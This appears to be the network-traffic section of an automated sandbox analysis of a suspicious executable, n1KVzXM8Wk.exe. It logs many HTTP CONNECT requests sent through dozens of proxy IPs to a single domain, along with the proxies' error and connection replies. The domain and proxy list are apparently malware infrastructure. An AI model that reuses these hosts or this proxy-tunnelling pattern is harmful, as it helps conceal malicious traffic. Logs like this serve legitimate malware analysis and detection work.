                                                                                                      Feb 23, 2024 09:45:29.834841967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834619999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834676981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1493192.168.2.454198208.109.14.49356186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.871370077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1494192.168.2.45383098.162.25.7316536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.875343084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1495192.168.2.454310104.22.50.220806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.876317978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.964364052 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1496192.168.2.454190117.54.142.4680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.880655050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.716306925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.834825039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.944044113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147288084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.444173098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.646783113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:53.053020954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:09.904215097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1497192.168.2.454203103.118.46.17480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.882215977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1498192.168.2.454227154.236.189.1519816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.886367083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.475035906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178514004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680516005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.365978956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084259987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.865801096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.084274054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.521809101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1499192.168.2.453923194.163.129.179512126812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.886637926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1500192.168.2.453879178.253.200.20910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.895844936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1501192.168.2.454145103.204.54.5010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.904620886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1502192.168.2.454350172.64.152.98806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.949413061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.041878939 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1503192.168.2.454248109.87.130.656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.991353989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1504192.168.2.454276109.247.104.237806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.005134106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.194194078 CET310INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1505192.168.2.45425546.107.230.12210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.006546021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1506192.168.2.454299196.20.125.14980836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.046561003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1507192.168.2.454383104.20.198.49806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.046771049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.133709908 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1508192.168.2.454397172.67.181.126806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.059195042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.146800995 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1509192.168.2.4544051.0.0.84806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.059355021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.146847010 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1510192.168.2.451653154.12.253.23285416812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.059530973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178270102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.179002047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.178476095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1511192.168.2.4543555.196.119.17431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.087868929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.275125027 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1512192.168.2.453159145.239.2.102132476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.087958097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1513192.168.2.454072142.54.232.641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.088005066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1514192.168.2.454462198.199.86.1131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.088851929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.183696032 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1515192.168.2.45443851.79.87.144417466812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.088854074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1516192.168.2.45161281.250.223.126806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.088965893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.574568033 CET830INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                      Content-Length: 638
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1517192.168.2.45317251.210.45.148622836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.088968039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.574014902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147178888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.240926027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.377594948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557708025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
